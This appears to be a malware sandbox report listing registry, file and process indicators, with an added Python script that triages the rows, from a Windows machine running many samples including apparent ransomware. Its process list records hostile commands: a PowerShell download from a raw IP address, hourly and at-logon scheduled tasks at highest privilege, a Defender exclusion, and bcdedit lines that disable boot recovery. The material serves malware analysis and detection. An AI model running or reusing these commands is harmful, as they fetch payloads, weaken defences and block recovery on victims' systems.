| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = (blob data omitted) | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\a\ld.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\a\New.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
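The indicator tables above are raw sandbox output: the ld.exe file rows (ransom notes next to hundreds of touched files under Program Files), the CentralProcessor and BIOS registry reads, the certificate written to the machine ROOT store by svhoost.exe, the EnableLUA = "0" policy change and the axplont.job drop all sit in the same flat format. The first triage step is to turn those rows into per-process findings. The following Python is an added example, not part of this report and not tooling from any sandbox vendor: it parses rows in the table format used on this page, tags them with a small taxonomy of this example's own devising (tag names, the severe-tag set and the mass-modification threshold are assumptions), and aggregates per process. The embedded sample rows are a constructed subset copied from the tables above.

```python
"""Triage helper for sandbox indicator tables in the format used on this page.

Added example: not part of the original report and not any vendor's tooling.
Tag names, SEVERE_TAGS and the mass-modification threshold are assumptions.
"""
import re
from collections import defaultdict

# Ransom-note file name observed in the report's file rows.
RANSOM_NOTE_NAME = "HOW TO BACK FILES.txt"

# Registry keys read for hardware/VM fingerprinting (compared upper-cased).
HW_FINGERPRINT_PREFIXES = (
    r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR",
    r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\BIOS",
)
ROOT_CERT_RE = re.compile(r"\\SystemCertificates\\ROOT\\Certificates\\([0-9A-F]{40})", re.I)
UAC_OFF_RE = re.compile(r'\\Policies\\System\\EnableLUA = "0"', re.I)
TASK_JOB_RE = re.compile(r"^C:\\Windows\\Tasks\\[^\\]+\.job$", re.I)

# Tags that on their own justify a closer look; hw_fingerprint alone is noise
# (browsers read the BIOS keys too, as the report's chrome.exe rows show).
SEVERE_TAGS = {"ransom_note", "root_cert_added", "uac_disabled", "task_job_dropped"}

# Constructed sample: rows copied from the tables above, plus one header row.
SAMPLE_ROWS = r"""
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedWideTile.scale-200.png | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Templates\1033\GettingStarted16\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office15\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\classlist | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\HOW TO BACK FILES.txt | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ppd.xrm-ms | C:\Users\Admin\Desktop\a\ld.exe | N/A |
| File created | C:\Windows\Tasks\axplont.job | C:\Users\Admin\Desktop\a\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" | C:\Users\Admin\Desktop\a\ld.exe | N/A |
"""


def parse_rows(report_text):
    """Yield (description, indicator, process) for each data row; headers are skipped."""
    for line in report_text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Description":
            continue
        yield cells[0], cells[1], cells[2]


def classify(description, indicator):
    """Return the set of behaviour tags a single row earns (this example's taxonomy)."""
    tags = set()
    if indicator.endswith("\\" + RANSOM_NOTE_NAME):
        tags.add("ransom_note")          # note drop, or the note being re-opened
    elif description == "File opened for modification" and \
            indicator.upper().startswith("C:\\PROGRAM FILES"):
        tags.add("program_files_modified")  # candidate encryption victim
    if indicator.upper().startswith(HW_FINGERPRINT_PREFIXES):
        tags.add("hw_fingerprint")
    if ROOT_CERT_RE.search(indicator):
        tags.add("root_cert_added")
    if UAC_OFF_RE.search(indicator):
        tags.add("uac_disabled")
    if description == "File created" and TASK_JOB_RE.match(indicator):
        tags.add("task_job_dropped")
    return tags


def summarise(report_text):
    """Aggregate tag counts per process: {process: {tag: count}}."""
    summary = defaultdict(lambda: defaultdict(int))
    for description, indicator, process in parse_rows(report_text):
        for tag in classify(description, indicator):
            summary[process][tag] += 1
    return {proc: dict(tags) for proc, tags in summary.items()}


def flagged(summary, mass_threshold=3):
    """Processes worth a responder's attention: any severe tag, or many Program Files writes."""
    out = {}
    for proc, tags in summary.items():
        hits = sorted(t for t in tags if t in SEVERE_TAGS)
        if tags.get("program_files_modified", 0) >= mass_threshold:
            hits.append("mass_program_files_modification")
        if hits:
            out[proc] = hits
    return out


def root_cert_thumbprints(report_text):
    """SHA-1 thumbprints of certificates written to the machine ROOT store (host IOCs)."""
    found = set()
    for _, indicator, _ in parse_rows(report_text):
        match = ROOT_CERT_RE.search(indicator)
        if match:
            found.add(match.group(1).upper())
    return found


if __name__ == "__main__":
    summary = summarise(SAMPLE_ROWS)
    for proc, hits in flagged(summary).items():
        print(f"{proc}: {', '.join(hits)}")
    print("ROOT store thumbprints:", root_cert_thumbprints(SAMPLE_ROWS))
```

Run against the full report rather than the sample, the mass-modification threshold should be raised to something in the hundreds; on this page ld.exe alone accounts for thousands of "File opened for modification" rows. The ROOT-store thumbprint is the most portable host IOC in the section: a certificate with that SHA-1 present in the machine ROOT store on an endpoint is a direct indicator, independent of the file names the dropper chose.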
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9ff97ab58,0x7ff9ff97ab68,0x7ff9ff97ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2260 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3104 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4348 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4456 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4340 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4768 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4464 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4816 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4880 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4968 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3272 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Users\Admin\Desktop\New Text Document.exe
"C:\Users\Admin\Desktop\New Text Document.exe"
C:\Users\Admin\Desktop\a\volumeinfo.exe
"C:\Users\Admin\Desktop\a\volumeinfo.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4356 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3244 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4868 --field-trial-handle=1940,i,12970112912691648928,10866989188800775912,131072 /prefetch:8
C:\Users\Admin\Desktop\a\Zinker.exe
"C:\Users\Admin\Desktop\a\Zinker.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\a\smartsoftsignew.exe
"C:\Users\Admin\Desktop\a\smartsoftsignew.exe"
C:\Users\Admin\Desktop\a\ADServices.exe
"C:\Users\Admin\Desktop\a\ADServices.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
C:\Users\Admin\Desktop\a\New.exe
"C:\Users\Admin\Desktop\a\New.exe"
C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
"C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\New.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6
C:\Windows\SysWOW64\tar.exe
tar -xf putty.zip
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0x40,0x12c,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2032 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,951587722000744012,4845294282639400363,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
C:\Users\Admin\Desktop\a\volumeinfo.exe
"C:\Users\Admin\Desktop\a\volumeinfo.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 640 -ip 640
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 640 -s 312
C:\Users\Admin\Desktop\a\GTA_V.exe
"C:\Users\Admin\Desktop\a\GTA_V.exe"
C:\Users\Admin\Desktop\a\CapSimple.exe
"C:\Users\Admin\Desktop\a\CapSimple.exe"
C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp" /SL5="$130258,18247052,1148416,C:\Users\Admin\Desktop\a\GTA_V.exe"
C:\Users\Admin\Desktop\a\RambledMimets.exe
"C:\Users\Admin\Desktop\a\RambledMimets.exe"
C:\Users\Admin\Desktop\a\ld.exe
"C:\Users\Admin\Desktop\a\ld.exe"
C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe
"C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\libs.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
C:\Users\Admin\Desktop\a\MSiedge.exe
"C:\Users\Admin\Desktop\a\MSiedge.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\bcdedit.exe
bcdedit /set {current} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {current} recoveryenabled no
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe
"C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\IJUP069TW.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2
C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe
